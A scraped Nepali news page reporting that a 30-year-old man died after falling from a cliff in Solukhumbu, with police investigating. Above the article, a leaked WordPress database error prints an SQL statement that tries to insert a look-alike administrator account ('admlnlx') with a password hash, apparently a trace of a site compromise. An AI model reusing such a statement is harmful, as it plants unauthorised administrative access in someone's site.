WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bn1QXeB/cRd9dWLSZVAyruaRzFcU0.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:29:23', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १३ भाद्र, सोलुखुम्बु । सोलुखुम्बु जिल्लाको खुम्बुपासाङल्हामु गाउँपालिका २ स्थित सुर्केको भिरबाट लडेर एक जनाको ज्यान गएको छ ।
विहिबार दिउसो मानसिक सन्तुलन ठिक नभएका ३० वर्षिया आङ सेर्की शेपाको मृत्यु भएको सोलुखुम्बु प्रहरीले जनाएको छ ।
स्थानिय शेर्पा सुर्के खोलाको भिरबाट लडेर अन्दाजी २ सय मिटर तल खस्दा घटना स्थमै ज्यान गएको प्रहरीले जनाएको छ । घटनाको विषयमा थप अनुसन्धान भइरहेको प्रहरी निरिक्षक उत्तम कार्कीले जानकारी दिए ।